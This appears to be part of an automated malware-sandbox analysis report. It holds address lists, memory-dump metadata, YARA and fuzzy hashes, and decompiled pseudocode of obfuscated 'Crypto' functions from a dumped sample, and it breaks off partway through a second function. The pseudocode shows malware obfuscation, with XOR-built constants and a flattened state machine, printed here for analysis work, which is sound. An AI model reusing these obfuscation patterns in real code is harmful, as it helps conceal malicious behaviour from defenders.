                                              0x00235176
                                              0x0023517e
                                              0x00235189
                                              0x00235191
                                              0x00235196
                                              0x0023519e
                                              0x002351a6
                                              0x002351ae
                                              0x002351b6
                                              0x002351be
                                              0x002351c3
                                              0x002351cb
                                              0x002351d0
                                              0x002351d8
                                              0x002351e0
                                              0x002351e9
                                              0x002351f2
                                              0x002351f7
                                              0x002351fd
                                              0x00235205
                                              0x00235218
                                              0x0023521b
                                              0x0023521e
                                              0x00235225
                                              0x00235230
                                              0x00235238
                                              0x00235240
                                              0x00235248
                                              0x00235250
                                              0x00235258
                                              0x00235260
                                              0x00235265
                                              0x0023526d
                                              0x00235275
                                              0x00235280
                                              0x00235288
                                              0x00235293
                                              0x002352a0
                                              0x002352a4
                                              0x002352b1
                                              0x002352b5
                                              0x002352bd
                                              0x002352c8
                                              0x002352d3
                                              0x002352de
                                              0x002352e6
                                              0x002352f0
                                              0x002352f4
                                              0x002352fc
                                              0x00235306
                                              0x00235312
                                              0x00235317
                                              0x0023531d
                                              0x00235322
                                              0x0023532a
                                              0x00235332
                                              0x0023533a
                                              0x0023533f
                                              0x00235344
                                              0x0023534c
                                              0x00235354
                                              0x0023535c
                                              0x00235361
                                              0x00235369
                                              0x00235371
                                              0x00235379
                                              0x00235381
                                              0x0023538b
                                              0x0023538e
                                              0x00235392
                                              0x0023539a
                                              0x002353a5
                                              0x002353b0
                                              0x002353bb
                                              0x002353c6
                                              0x002353ce
                                              0x002353d9
                                              0x002353e4
                                              0x002353ec
                                              0x002353f7
                                              0x002353ff
                                              0x00235407
                                              0x0023540f
                                              0x00235417
                                              0x0023541f
                                              0x00235427
                                              0x0023542f
                                              0x0023543c
                                              0x00235440
                                              0x00235445
                                              0x0023544d
                                              0x00235455
                                              0x0023545d
                                              0x00235465
                                              0x0023546d
                                              0x00235475
                                              0x00235480
                                              0x00235488
                                              0x00235493
                                              0x0023549b
                                              0x002354a3
                                              0x002354b0
                                              0x002354b4
                                              0x002354bc
                                              0x002354c8
                                              0x002354cd
                                              0x002354d3
                                              0x002354db
                                              0x002354e3
                                              0x002354eb
                                              0x002354f4
                                              0x002354f7
                                              0x002354fb
                                              0x00235503
                                              0x0023550b
                                              0x00235513
                                              0x0023551b
                                              0x00235525
                                              0x00235530
                                              0x00235538
                                              0x00235543
                                              0x0023554e
                                              0x00235559
                                              0x00235564
                                              0x00235573
                                              0x0023557a
                                              0x0023557e
                                              0x00235586
                                              0x0023558e
                                              0x0023559b
                                              0x0023559f
                                              0x002355a7
                                              0x002355af
                                              0x002355bc
                                              0x002355c8
                                              0x002355cf
                                              0x002355d3
                                              0x002355db
                                              0x002355e3
                                              0x002355eb
                                              0x002355f3
                                              0x002355fb
                                              0x00235603
                                              0x00235619
                                              0x00235620
                                              0x0023562b
                                              0x0023563e
                                              0x00235641
                                              0x00235648
                                              0x00235653
                                              0x0023565e
                                              0x00235666
                                              0x00235671
                                              0x00235687
                                              0x0023568e
                                              0x00235699
                                              0x002356a1
                                              0x002356ad
                                              0x002356b0
                                              0x002356b7
                                              0x002356bb
                                              0x002356c3
                                              0x002356d6
                                              0x002356dd
                                              0x002356e8
                                              0x002356f0
                                              0x002356f8
                                              0x00235700
                                              0x00235708
                                              0x00235710
                                              0x00235722
                                              0x00235848
                                              0x0023584d
                                              0x00235854
                                              0x00235857
                                              0x0023585c
                                              0x00000000
                                              0x0023585c
                                              0x0023572e
                                              0x00235817
                                              0x00235821
                                              0x00000000
                                              0x00235821
                                              0x0023573a
                                              0x00235806
                                              0x0023580d
                                              0x002357ea
                                              0x002357ea
                                              0x00000000
                                              0x002357ea
                                              0x00235746
                                              0x002357c7
                                              0x002357c8
                                              0x002357d1
                                              0x002357d3
                                              0x002357d8
                                              0x002357da
                                              0x00235998
                                              0x00235998
                                              0x00000000
                                              0x00235998
                                              0x002357e3
                                              0x002357e8
                                              0x002357e8
                                              0x00000000
                                              0x002357e8
                                              0x00235748
                                              0x0023574e
                                              0x0023598c
                                              0x0023598c
                                              0x00235992
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00235992
                                              0x00235754
                                              0x00235759
                                              0x00235792
                                              0x002357ab
                                              0x00000000
                                              0x002357b5
                                              0x002358a2
                                              0x002358a7
                                              0x002358b0
                                              0x002358c3
                                              0x002358ef
                                              0x002358f4
                                              0x002358f9
                                              0x002358fe
                                              0x00235913
                                              0x0023596b
                                              0x0023596b
                                              0x00235978
                                              0x0023597d
                                              0x00235984
                                              0x00235987
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
                                              • API String ID: 0-2620103065
                                              • Opcode ID: eb78cce5d490038e1887581b56f9f3ed37a1a8038c33a47271346ff23e76988f
                                              • Instruction ID: 48333913d89a0d631b143025593600d25302548684c6767f6496242d78cea238
                                              • Opcode Fuzzy Hash: eb78cce5d490038e1887581b56f9f3ed37a1a8038c33a47271346ff23e76988f
                                              • Instruction Fuzzy Hash: 09222371508380DFE364CF25C58AA8BFBE2BBC4748F108A1DE5D9962A1D7B58949CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00224A35, Relevance: 16.7, Strings: 13, Instructions: 468COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00224A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E00236D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E0022F536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E0022F536(_v1644, _v1772, _v1612, _t508);
									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E00231773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
											_push(_t524);
											_push(_v1660);
											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E0022568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E002229E3( &_v524, 0x104, E0023889D(0x23c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E00232025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E00234F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E00228736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E0022C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E0022F536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E0023388A();
								_t479 = E00230ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E0022B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E002280BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E002288E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0x23c8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0x23ca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0x23ca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}
























































































                                              0x00224a3b
                                              0x00224a46
                                              0x00224a51
                                              0x00224a5c
                                              0x00224a64
                                              0x00224a6c
                                              0x00224a71
                                              0x00224a79
                                              0x00224a81
                                              0x00224a8c
                                              0x00224a94
                                              0x00224a9f
                                              0x00224aaa
                                              0x00224ab2
                                              0x00224abd
                                              0x00224ad3
                                              0x00224ada
                                              0x00224ae3
                                              0x00224aea
                                              0x00224aef
                                              0x00224af8
                                              0x00224b03
                                              0x00224b0b
                                              0x00224b13
                                              0x00224b1b
                                              0x00224b23
                                              0x00224b35
                                              0x00224b3a
                                              0x00224b43
                                              0x00224b4e
                                              0x00224b5a
                                              0x00224b5d
                                              0x00224b61
                                              0x00224b69
                                              0x00224b71
                                              0x00224b79
                                              0x00224b81
                                              0x00224b85
                                              0x00224b8d
                                              0x00224b98
                                              0x00224ba0
                                              0x00224bab
                                              0x00224bb6
                                              0x00224bc1
                                              0x00224bcc
                                              0x00224bd4
                                              0x00224bdc
                                              0x00224be4
                                              0x00224bec
                                              0x00224bf4
                                              0x00224bff
                                              0x00224c0a
                                              0x00224c15
                                              0x00224c20
                                              0x00224c28
                                              0x00224c33
                                              0x00224c3e
                                              0x00224c49
                                              0x00224c54
                                              0x00224c67
                                              0x00224c6e
                                              0x00224c79
                                              0x00224c81
                                              0x00224c89
                                              0x00224c8e
                                              0x00224c98
                                              0x00224ca8
                                              0x00224cae
                                              0x00224cb6
                                              0x00224cbb
                                              0x00224cc3
                                              0x00224cce
                                              0x00224cd9
                                              0x00224ce4
                                              0x00224cec
                                              0x00224cf1
                                              0x00224cf9
                                              0x00224d01
                                              0x00224d09
                                              0x00224d14
                                              0x00224d1f
                                              0x00224d2a
                                              0x00224d32
                                              0x00224d37
                                              0x00224d3f
                                              0x00224d47
                                              0x00224d4f
                                              0x00224d57
                                              0x00224d5f
                                              0x00224d67
                                              0x00224d6f
                                              0x00224d77
                                              0x00224d80
                                              0x00224d85
                                              0x00224d8b
                                              0x00224d93
                                              0x00224d9e
                                              0x00224da9
                                              0x00224db4
                                              0x00224dbc
                                              0x00224dc4
                                              0x00224dc9
                                              0x00224dd1
                                              0x00224dd9
                                              0x00224de5
                                              0x00224de8
                                              0x00224dec
                                              0x00224df4
                                              0x00224dfc
                                              0x00224e04
                                              0x00224e09
                                              0x00224e0e
                                              0x00224e16
                                              0x00224e21
                                              0x00224e29
                                              0x00224e34
                                              0x00224e3c
                                              0x00224e44
                                              0x00224e49
                                              0x00224e51
                                              0x00224e64
                                              0x00224e6b
                                              0x00224e76
                                              0x00224e7e
                                              0x00224e86
                                              0x00224e8e
                                              0x00224e96
                                              0x00224e9e
                                              0x00224ea6
                                              0x00224eae
                                              0x00224eb6
                                              0x00224ec1
                                              0x00224ecc
                                              0x00224ed7
                                              0x00224ee4
                                              0x00224eef
                                              0x00224efa
                                              0x00224f02
                                              0x00224f0a
                                              0x00224f12
                                              0x00224f1a
                                              0x00224f22
                                              0x00224f27
                                              0x00224f2c
                                              0x00224f34
                                              0x00224f3c
                                              0x00224f4a
                                              0x00224f4f
                                              0x00224f5a
                                              0x00224f5b
                                              0x00224f5f
                                              0x00224f67
                                              0x00224f72
                                              0x00224f7d
                                              0x00224f88
                                              0x00224f93
                                              0x00224f9e
                                              0x00224fa9
                                              0x00224fb4
                                              0x00224fbf
                                              0x00224fca
                                              0x00224fd7
                                              0x00224fdb
                                              0x00224fe3
                                              0x00224fe8
                                              0x00224ff0
                                              0x00224ffb
                                              0x00225003
                                              0x0022500e
                                              0x00225019
                                              0x00225021
                                              0x0022502c
                                              0x00225034
                                              0x0022503c
                                              0x00225044
                                              0x00225049
                                              0x00225051
                                              0x00225059
                                              0x00225063
                                              0x00225067
                                              0x0022506f
                                              0x00225077
                                              0x00225082
                                              0x0022508d
                                              0x00225098
                                              0x002250a0
                                              0x002250a5
                                              0x002250ad
                                              0x002250b5
                                              0x002250c0
                                              0x002250cb
                                              0x002250d6
                                              0x002250e1
                                              0x002250ee
                                              0x002250f2
                                              0x002250fa
                                              0x00225102
                                              0x0022510a
                                              0x00225118
                                              0x00225121
                                              0x00225125
                                              0x0022512d
                                              0x00225135
                                              0x0022513d
                                              0x00225142
                                              0x00225155
                                              0x0022515a
                                              0x00225161
                                              0x00225163
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x0022516f
                                              0x0022516f
                                              0x0022516f
                                              0x0022516f
                                              0x00225175
                                              0x00000000
                                              0x00000000
                                              0x0022517b
                                              0x00000000
                                              0x002254f8
                                              0x00225187
                                              0x00225193
                                              0x002252e9
                                              0x002252ef
                                              0x002252f0
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x00225199
                                              0x0022519f
                                              0x002252ad
                                              0x002252b8
                                              0x002252bd
                                              0x002252bf
                                              0x002252c2
                                              0x002252c9
                                              0x002252ce
                                              0x00000000
                                              0x002251a5
                                              0x002251ab
                                              0x0022525c
                                              0x0022525d
                                              0x0022526d
                                              0x0022526f
                                              0x00225277
                                              0x00225279
                                              0x0022527d
                                              0x00225284
                                              0x00225285
                                              0x0022528a
                                              0x0022528d
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x002251b1
                                              0x002251b3
                                              0x002251e0
                                              0x0022522f
                                              0x00225234
                                              0x0022524b
                                              0x00225251
                                              0x00225252
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x002251b5
                                              0x002251bb
                                              0x00000000
                                              0x002251c1
                                              0x002251d3
                                              0x002251d8
                                              0x002251d9
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x0022516a
                                              0x002251bb
                                              0x002251b3
                                              0x002251ab
                                              0x0022519f
                                              0x002253b2
                                              0x002253b2
                                              0x002253b2
                                              0x0022530c
                                              0x00225310
                                              0x00225311
                                              0x00225316
                                              0x00225319
                                              0x0022531a
                                              0x0022531c
                                              0x00225322
                                              0x00225323
                                              0x00225342
                                              0x0022534a
                                              0x0022534f
                                              0x00225352
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022531c
                                              0x0022535c
                                              0x00225362
                                              0x002254bd
                                              0x002254c4
                                              0x002254c9
                                              0x00000000
                                              0x00225368
                                              0x00225368
                                              0x0022536e
                                              0x00225439
                                              0x00225440
                                              0x00225445
                                              0x0022545c
                                              0x00225490
                                              0x00225495
                                              0x0022549a
                                              0x0022549c
                                              0x00000000
                                              0x00225374
                                              0x00225374
                                              0x0022537a
                                              0x00225404
                                              0x0022540c
                                              0x00225414
                                              0x00225415
                                              0x00000000
                                              0x0022537c
                                              0x0022537c
                                              0x00225382
                                              0x002253c8
                                              0x002253ce
                                              0x002253d6
                                              0x002253d8
                                              0x002253d9
                                              0x002253d9
                                              0x002253df
                                              0x002253df
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x00225384
                                              0x00225384
                                              0x0022538a
                                              0x00225397
                                              0x0022539a
                                              0x0022539f
                                              0x002253a2
                                              0x00000000
                                              0x002253a2
                                              0x00000000
                                              0x0022538a
                                              0x00225382
                                              0x0022537a
                                              0x0022536e
                                              0x00000000
                                              0x002254ce
                                              0x002254ce
                                              0x002254ce
                                              0x00000000
                                              0x0022516f

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
                                              • API String ID: 0-2931794159
                                              • Opcode ID: 5d56ee85ed22231856a5eba70b406ff3540e88711f137481a8a6f19e35d0ae22
                                              • Instruction ID: 4704ed8230d0f9b9165d0f56cb11c30602706cc909e46af53aafadcdae08ea3b
                                              • Opcode Fuzzy Hash: 5d56ee85ed22231856a5eba70b406ff3540e88711f137481a8a6f19e35d0ae22
                                              • Instruction Fuzzy Hash: ED323271518781DFE3B8CF61D54AA8BBBE1BBC4304F108A1DE5DA962A0D7B59819CF03
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00228F78, Relevance: 15.4, Strings: 12, Instructions: 367COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E00228F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
